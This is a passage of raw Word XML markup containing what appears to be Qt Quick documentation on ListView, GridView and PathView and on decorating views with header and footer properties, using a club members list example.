      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>standard views</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are provided in the basic set of Qt Quick graphical types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2551" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- arranges items in a horizontal or vertical list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2552" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- arranges items in a grid within the available space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2553" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PathView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- arranges items on a path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These types have properties and behaviors exclusive to each type. Visit their respective documentation for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2262" w:name="decorating-views"/>
      <w:bookmarkStart w:id="2263" w:name="_Toc483001019"/>
      <w:bookmarkStart w:id="2264" w:name="_Toc483004010"/>
      <w:bookmarkStart w:id="2265" w:name="_Toc483604360"/>
      <w:bookmarkStart w:id="2266" w:name="_Toc483605580"/>
      <w:bookmarkEnd w:id="2262"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Decorating Views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2263"/>
      <w:bookmarkEnd w:id="2264"/>
      <w:bookmarkEnd w:id="2265"/>
      <w:bookmarkEnd w:id="2266"/>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Views allow visual customization through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>decoration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties such as the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>footer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. By binding an object, usually another visual object, to these properties, the views are decoratable. A footer may include a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2554" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type showcasing borders or a header that displays a logo on top of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suppose that a specific club wants to decorate its members list with its brand colors. A member list is in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will display the model's content.</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example.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ListModel</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"Alice"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"Bob"</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"Jane"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"Harry"</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"Wendy"</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Default="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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Component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font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pixelSize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24</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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The club may decorate the members list by binding visual objects to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>footer</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">properties. </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The visual object may be defined inline, in another file, or in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2555" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>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ListView</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fill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clip</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true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model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delegate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header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bannercomponent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footer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Rectangle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height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30</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        gradient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clubcolors</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highlight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Rectangle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width</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color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"lightgray"</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Component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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//instantiated when header is processed</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bannercomponent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Rectangle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banner</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height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50</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gradient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clubcolors</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border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color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"#9EDDF2"</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centerIn</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"Club Members"</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font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pixelSize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32</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Gradient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clubcolors</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GradientStop</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position</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0.0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color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"#8EE2FE"</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rPr>
        <w:t>GradientStop</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> position</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> color</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"#7ED2EE"</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/listview-decorations.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
